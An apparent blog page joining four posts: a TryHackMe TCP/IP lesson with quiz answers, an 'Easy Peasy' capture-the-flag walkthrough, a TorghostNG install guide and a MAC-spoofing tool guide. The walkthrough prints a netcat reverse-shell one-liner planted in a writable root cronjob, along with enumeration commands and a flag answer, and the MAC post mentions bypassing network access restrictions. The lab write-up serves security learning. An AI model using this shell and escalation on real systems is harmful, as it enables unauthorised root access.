  • The TCP IP Model in Networking






    The TCP IP Model



    The TCP/IP model is, in many ways, very similar to the OSI model. It's a few years older, and serves as the basis for real-world networking. The TCP/IP model consists of four layers: Application, Transport, Internet and Network Interface. Between them, these cover the same range of functions as the seven layers of the OSI Model.












    You would be justified in asking why we bother with the OSI model if it's not actually used for anything in the real-world. The answer to that question is quite simply that the OSI model (due to being less condensed and more rigid than the TCP/IP model) tends to be easier for learning the initial theory of networking.










    The two models match up something like this:


    The processes of encapsulation and de-encapsulation work in exactly the same way with the TCP/IP model as they do with the OSI model. At each layer of the TCP/IP model a header is added during encapsulation, and removed during de-encapsulation.


    Now let's get down to the practical side of things.


    A layered model is great as a visual aid -- it shows us the general process of how data can be encapsulated and sent across a network, but how does it actually happen?





    When we talk about TCP/IP, it's all well and good to think about a table with four layers in it, but we're actually talking about a suite of protocols -- sets of rules that define how an action is to be carried out. TCP/IP takes its name from the two most important of these: the Transmission Control Protocol (which we touched upon earlier in the OSI model) that controls the flow of data between two endpoints, and the Internet Protocol, which controls how packets are addressed and sent. There are many more protocols that make up the TCP/IP suite; we will cover some of these in later tasks. For now though, let's talk about TCP.


    As mentioned earlier, TCP is a connection-based protocol. In other words, before you send any data via TCP, you must first form a stable connection between the two computers. The process of forming this connection is called the three-way handshake.


    When you attempt to make a connection, your computer first sends a special request to the remote server indicating that it wants to initialise a connection. This request contains something called a SYN (short for synchronise) bit, which essentially makes first contact in starting the connection process. The server will then respond with a packet containing the SYN bit, as well as another "acknowledgement" bit, called ACK. Finally, your computer will send a packet that contains the ACK bit by itself, confirming that the connection has been set up successfully. With the three-way handshake successfully completed, data can be reliably transmitted between the two computers. Any data that is lost or corrupted on transmission is re-sent, thus leading to a connection which appears to be lossless.












    (Credit Kieran Smith, Abertay University, TryHackMe)


    We're not going to go into exactly how this works on a step-by-step level -- not in this room at any rate. It is sufficient to know that the three-way handshake must be carried out before a connection can be established using TCP.
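The handshake described above, as an added example that is not part of the original post: it packs three constructed TCP headers, reads the SYN and ACK bits back out, and checks that they form a valid three-way handshake. It goes slightly beyond the text by also checking the sequence and acknowledgement numbers; the ports and sequence numbers are made-up sample values.

```python
import struct

# Flag bits in byte 13 of the TCP header.
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10
_NAMES = ((SYN, "SYN"), (ACK, "ACK"), (FIN, "FIN"), (RST, "RST"), (PSH, "PSH"))
_FMT = "!HHIIBBHHH"  # ports, seq, ack, data offset, flags, window, checksum, urgent
_CONTROL = SYN | ACK | FIN | RST


def build_header(sport, dport, seq, ack, flags):
    """Encapsulation: pack a 20-byte TCP header (no options, checksum 0)."""
    return struct.pack(_FMT, sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)


def parse_header(raw):
    """De-encapsulation: read the fixed 20-byte part of a TCP header."""
    if len(raw) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off, flags, _, _, _ = struct.unpack(_FMT, raw[:20])
    if (off >> 4) < 5:
        raise ValueError("data offset below the 20-byte minimum")
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags}


def flag_names(flags):
    return "/".join(name for bit, name in _NAMES if flags & bit) or "none"


def check_handshake(segments):
    """Return (ok, reason) for three raw TCP headers in capture order."""
    if len(segments) != 3:
        return False, "need exactly three segments"
    c1, s1, c2 = (parse_header(s) for s in segments)
    if (c1["flags"] & _CONTROL) != SYN:
        return False, "step 1 is %s, expected SYN" % flag_names(c1["flags"])
    if (s1["flags"] & _CONTROL) != (SYN | ACK):
        return False, "step 2 is %s, expected SYN/ACK" % flag_names(s1["flags"])
    if (s1["sport"], s1["dport"]) != (c1["dport"], c1["sport"]):
        return False, "step 2 does not come from the contacted port"
    want = (c1["seq"] + 1) & 0xFFFFFFFF  # the SYN consumes one sequence number
    if s1["ack"] != want:
        return False, "step 2 acknowledges %d, expected %d" % (s1["ack"], want)
    if (c2["flags"] & _CONTROL) != ACK:
        return False, "step 3 is %s, expected ACK" % flag_names(c2["flags"])
    want = (s1["seq"] + 1) & 0xFFFFFFFF
    if c2["ack"] != want or c2["seq"] != s1["ack"]:
        return False, "step 3 does not acknowledge the server's SYN"
    return True, "established"


# Constructed capture: client port 50000 connects to port 80.
GOOD = [
    build_header(50000, 80, 1000, 0, SYN),
    build_header(80, 50000, 5000, 1001, SYN | ACK),
    build_header(50000, 80, 1001, 5001, ACK),
]

if __name__ == "__main__":
    for raw in GOOD:
        print(flag_names(parse_header(raw)["flags"]))
    print(check_handshake(GOOD))
```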



    History:


    It's important to understand exactly why the TCP/IP and OSI models were originally created. To begin with there was no standardisation -- different manufacturers followed their own methodologies, and consequently systems made by different manufacturers were completely incompatible when it came to networking. The TCP/IP model was introduced by the American DoD in 1982 to provide a standard -- something for all of the different manufacturers to follow. This sorted out the inconsistency problems. Later the OSI model was also introduced by the International Organisation for Standardisation (ISO); however, it's mainly used as a more comprehensive guide for learning, as the TCP/IP model is still the standard upon which modern networking is based.




    #1 Which model was introduced first, OSI or TCP/IP?

    Ans :- TCP/IP




    #2 Which layer of the TCP/IP model covers the functionality of the Transport layer of the OSI model (Full Name)?

    Ans :- transport



    #3 Which layer of the TCP/IP model covers the functionality of the Session layer of the OSI model (Full Name)?


    Ans :- Application



    #4 The Network Interface layer of the TCP/IP model covers the functionality of two layers in the OSI model. These layers are Data Link, and?.. (Full Name)?

    Ans :- Physical



    #5 Which layer of the TCP/IP model handles the functionality of the OSI network layer?

    Ans :- Internet



    #6 What kind of protocol is TCP?

    Ans :- Connection-based



    #7 What is SYN short for?

    Ans :- Synchronise



    #8 What is the second step of the three way handshake?

    Ans :- SYN/ACK



    #9 What is the short name for the "Acknowledgement" segment in the three-way handshake?

    Ans :- ACK




    I hope you liked this post. If you did, don't forget to share it.
    Thank you so much :-)




  • Easy Peasy TryHackMe walkthrough






    Easy Peasy


    Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.


    [Task 1] Enumeration through Nmap


    Deploy the machine attached to this task and use nmap to enumerate it.




    #1 How many ports are open?
     

    nmap -A -Pn -T4 -p- 10.10.158.249 --script vuln






    Ans :-




    #2 What is the version of nginx?






    Ans :-







    #3 What is running on the highest port?


    Ans :-







    Notice we have 3 ports open:

    · 80: nginx 1.16.1

    · 6498: OpenSSH 7.6p1

    · 65524: Apache httpd 2.4.43




    [Task 2] Compromising the machine


    Now you've enumerated the machine, answer questions and compromise it!


    #1 Using GoBuster, find flag 1.


    Now, the fun part begins!

    The questions in this task require us to find hidden pages and files. Hence, we can start a directory scan.



    gobuster dir -u http://TryHackMeIP/ -w /usr/share/dirb/wordlists/common.txt -x php,html,txt



    • dir : directory enumeration mode
    • -u  : target URL
    • -w  : path to the wordlist
    • -x  : file extensions to try, such as php, html, txt (-e only switches on expanded output with full URLs)






    We see robots.txt and a directory named “hidden”. You can check them out, but they are dead ends. For further enumeration, let’s enumerate this “hidden” directory too.



    gobuster dir -u http://10.10.158.249/hidden/ -w /usr/share/dirb/wordlists/common.txt -x php,html,txt







     Yeah, /whatever. Let us check what’s inside its source code, shall we?










     Nice! Our first flag, base64-encoded. Let’s decode it with:









    Ans :- 





    #2 Further enumerate the machine, what is flag 2?


    Now we can move on to find our 2nd Flag. Let us run gobuster to find hidden directories again.

    gobuster dir -u http://10.10.137.230:65524/ -w /usr/share/wordlists/dirb/common.txt



    Let’s check the “robots.txt” and notice a hash over there waiting to be cracked.
















    The thing is, we may know it is an MD5 hash, but cannot crack it. I searched everywhere and found the only website to crack it! This is the website:

    https://md5hashing.net/hash



    Just select “Search by all hash types” and have your 2nd Flag!



    Ans :- flag{1m_s3c0nd_fl4g}






    #3 Locate flag 3.


    http://10.10.176.180:65524










    We may think this is the default page but keep scrolling down to see your 3rd Flag without any encryption!









    Ans :-




    #4 What is the hidden directory?


    We are not over with this page so let’s view-source:http://10.10.137.230:65524/







    Notice the hidden tag on line 194. It’s a bit tricky, because it is NOT base64 and online tools won’t help at all. So I tried every decoder on http://icyberchef.com/ or https://www.better-converter.com/Encoders-Decoders/Base62-Encode and finally cracked the hash. The output indicated that it was indeed another hidden directory.









    Ans :- 






    #5 Using the file found in the hidden directory, find and crack a password hidden in the file.


    We may now enter the hidden directory on port 65524:






    We notice there is a hash and a picture waiting for us to investigate.

    First, let us crack the hash with https://md5hashing.net/hash again:








    Ans :-



    #6 What is the password to login to the machine via SSH?



    It was a hidden password after all, one we will use just a bit later. (Or now.)


    Remember the image on the hidden directory? Let’s download it on our desktop to reveal what’s inside…








    Use steghide to extract secrets out of this image and enter the password we just cracked.


    You can install it by:


    apt install steghide


    steghide extract -sf binarycodepixabay.jpg



    A secret text file will be extracted. Inside the text, we notice there is a username (boring) and a password for the SSH login, but the password is all binary.








     I used this site to convert the binary to text:

    https://www.rapidtables.com/convert/number/binary-to-ascii.html







    Ans :- 




    #7 What is the user flag?


    Finally, it is time to ssh into this machine and check what’s going on:


    ssh -p 6498 boring@10.10.137.230


    P.S. Don’t forget the flag -p 6498 because this machine’s ssh port is not 22, but 6498!


    ssh -p 6498 boring@10.10.175.149






    Run ls -la to see user.txt waiting to be opened.

    cat user.txt


    I searched “rotated online decode” on Google and found this site to decode this:


    https://rot13.com/







    Ans :- 






    #8 What is the root flag?



    To solve the last question, I needed to get root access. Thanks to the sentence in the description, “Then escalate your privileges through a vulnerable cronjob.”, I found the vulnerable cronjob, which is located in the /var/www directory. It was a hidden sh file that could be edited and executed. I inserted the following code into the file to get a reverse shell.












    rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc <ip> <port> >/tmp/f
















    At the same time, I also started a netcat listener to get my root shell. And after a minute I got it. I used the whoami command to check if I really was root. And yes I was. The root.txt was also a hidden file, so I used the ls -la command to list the hidden files and lastly used the cat command to read it.
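The weakness used above is a script that cron runs as root but that an unprivileged user can edit. The following audit for that condition is an added example, not part of the original walkthrough: it parses system-crontab lines (the format with a user field) and reports absolute paths, or their containing directory, that are missing, not owned by the trusted uid, or writable by group/others. The function names are this example's own, and relative paths after a `cd` are not resolved.

```python
import os
import shlex
import stat


def risky_reason(path, trusted_uid=0):
    """Say why an unprivileged user could alter `path`, or return None."""
    try:
        st = os.stat(path)
    except OSError:
        return "missing (whoever can create it controls the job)"
    if st.st_uid != trusted_uid:
        return "owned by uid %d" % st.st_uid
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group/world-writable (mode %o)" % stat.S_IMODE(st.st_mode)
    return None


def split_entry(line):
    """Return (user, command) for a system-crontab line, or None."""
    fields = line.split()
    if not fields or "=" in fields[0]:      # blank or VAR=value assignment
        return None
    skip = 1 if fields[0].startswith("@") else 5   # @reboot etc. or 5 time fields
    if len(fields) < skip + 2:
        return None
    return fields[skip], line.split(None, skip + 1)[skip + 1]


def audit_crontab(text, trusted_uid=0, privileged_users=("root",)):
    """Return (line_number, path, reason) for each risky path in privileged jobs."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if line.startswith("#"):
            continue
        entry = split_entry(line)
        if entry is None or entry[0] not in privileged_users:
            continue
        try:
            tokens = shlex.split(entry[1])
        except ValueError:                   # unbalanced quotes in the command
            tokens = entry[1].split()
        for tok in tokens:
            if not tok.startswith("/"):
                continue
            # The file and its directory both decide who can change the job.
            for target in (tok, os.path.dirname(tok)):
                reason = risky_reason(target, trusted_uid)
                if reason:
                    findings.append((lineno, target, reason))
    return findings


if __name__ == "__main__":
    if os.path.exists("/etc/crontab"):
        with open("/etc/crontab") as fh:
            for finding in audit_crontab(fh.read()):
                print("line %d: %s is %s" % finding)
```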



    This CTF was pretty fun to do and also pretty hard. I want to thank Kral4 again for this beautiful CTF and make sure to try it out. Thank you for reading.









    Ans :-








    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal





  • TorghostNG - How to anonymize your internet traffic






    Today we look at an open source tool that helps you stay anonymous: TorghostNG, which anonymizes all your internet traffic through the Tor network. The tool is written in Python.


    About TorghostNG


    TorghostNG is a tool that makes all your internet traffic anonymized through the Tor network.

    Rewritten from TorGhost with Python 3.

    TorghostNG was tested on:


    •     Kali Linux
    •     Manjaro
    •     ...
      
      
    Privoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes. It has application for both stand-alone systems and multi-user networks.

    Before you use TorghostNG


    • For the goodness of Tor network, BitTorrent traffic will be blocked by iptables, although you can bypass it with some tweaks to your torrent client. It's difficult to completely block all torrent traffic.
    • For security reasons, TorghostNG is gonna disable IPv6 to prevent IPv6 leaks (it happened to me lmao or whatismyip.live).
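A way to confirm the IPv6 state after the tool has run, as an added example that is not part of TorghostNG or the original post: it reads the Linux kernel's per-interface `disable_ipv6` switches and lists any globally scoped IPv6 addresses still assigned. The `/proc` paths are standard Linux; the function names and the sample table are this example's own, and how TorghostNG itself disables IPv6 is not assumed.

```python
import ipaddress
import os


def interfaces_with_ipv6_enabled(conf_root="/proc/sys/net/ipv6/conf"):
    """List entries (including 'all' and 'default') whose disable_ipv6 is not 1."""
    if not os.path.isdir(conf_root):
        return []  # no IPv6 stack loaded, nothing can leak
    enabled = []
    for iface in sorted(os.listdir(conf_root)):
        try:
            with open(os.path.join(conf_root, iface, "disable_ipv6")) as fh:
                if fh.read().strip() != "1":
                    enabled.append(iface)
        except OSError:
            continue  # interface vanished or entry unreadable
    return enabled


def global_ipv6_addresses(if_inet6_text):
    """Parse /proc/net/if_inet6 content; return (iface, address) with global scope."""
    found = []
    for line in if_inet6_text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        addr_hex, _index, _prefix, scope, _flags, iface = parts
        if int(scope, 16) == 0x00:  # 0x00 global, 0x10 host, 0x20 link-local
            found.append((iface, str(ipaddress.IPv6Address(int(addr_hex, 16)))))
    return found


# Constructed /proc/net/if_inet6 content (2001:db8::/32 is the documentation prefix).
SAMPLE_IF_INET6 = """\
00000000000000000000000000000001 01 80 10 80       lo
fe80000000000000021122fffe334455 02 40 20 80     eth0
20010db8000000000000000000000001 02 40 00 80     eth0
"""

if __name__ == "__main__":
    print("IPv6 still enabled on:", interfaces_with_ipv6_enabled())
    if os.path.exists("/proc/net/if_inet6"):
        with open("/proc/net/if_inet6") as fh:
            print("Global IPv6 addresses:", global_ipv6_addresses(fh.read()))
```

An empty result from both functions means no interface can send traffic from a routable IPv6 address outside the Tor path.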


    Installing TorghostNG


    TorghostNG currently supports:
    •     GNU/Linux distros based on Arch Linux
    •     GNU/Linux distros based on Debian/Ubuntu
    •     GNU/Linux distros based on Fedora, CentOS, RHEL, openSUSE
    •     Solus OS
    •     Void Linux
    •     Anh the elder guy: Slackware
    •     (Too many package managers for one day :v)

    How To Install ?

    1) git clone https://github.com/githacktools/TorghostNG




    2) ls

    cd TorghostNG

    ls






    3) sudo python3 install.py






    4) sudo python3 torghostng.py







    5) sudo python3 torghostng.py -s -c -id it












  • how to change MAC address with mac changer




    how to change MAC address with mac changer


    MAC (Media Access Control) address spoofing can be useful in many situations. By changing the MAC address, one can protect a system from system identification bots which look for MAC addresses to exploit network administrative privileges, fool freely available internet services in order to bypass network access and bandwidth usage restrictions, or make a system more secure by disguising its MAC address or replacing it with another NIC's randomly generated MAC address.


    Sadly, basic network tools are only for changing DHCP settings, switching between different network profiles, pinging DNS servers, etc. Therefore, you need to use a dedicated tool to change your network interface's MAC address. Technitium MAC Address Changer is developed to change your Network Interface Card (NIC) MAC address. You can choose a NIC from the given list whose MAC address will replace your original MAC address.





    Technitium MAC Address Changer allows you to change (spoof) the Media Access Control (MAC) address of your Network Interface Card (NIC) instantly. It has a very simple user interface and provides ample information regarding each NIC in the machine. Every NIC has a MAC address hard coded in its circuit by the manufacturer. This hard coded MAC address is used by Windows drivers to access the Ethernet network (LAN). This tool can set a new MAC address for your NIC, bypassing the original hard coded MAC address. Technitium MAC Address Changer is a must-have tool in every security professional's toolbox.







    Features



    • Works on Windows 10, 8 & 7 for both 32-bit and 64-bit.
    • Enhanced network configuration presets with IPv6 support allow you to quickly switch between network configurations.
    • Allows complete configuration of any network adapter.
    • Command line options with entire software functionality available. You can select a preset from specified preset file to apply directly.
    • Update network card vendors list feature allows you to download latest vendor data (OUI) from IEEE.org.



    How To Change MAC Address


    1. Starting MAC address changer will list all available network adapters.
    2. Select the adapter whose MAC address you want to change. You will get the details of your selection below.
    3. In the Information tab, find the Change MAC Address frame. Enter new MAC address in the field and click Change Now! button. You may even click Random MAC Address button to fill up a randomly selected MAC address from the vendor list available.
    4. To restore the original MAC address of the network adapter, select the adapter, click Restore Original button in the Change MAC Address frame.


    NOTE: This tool cannot change MAC address of Microsoft Network Bridge. Network Bridge will automatically use the original MAC address of the first NIC added into bridge with the first octet of MAC address set to 0x02.




         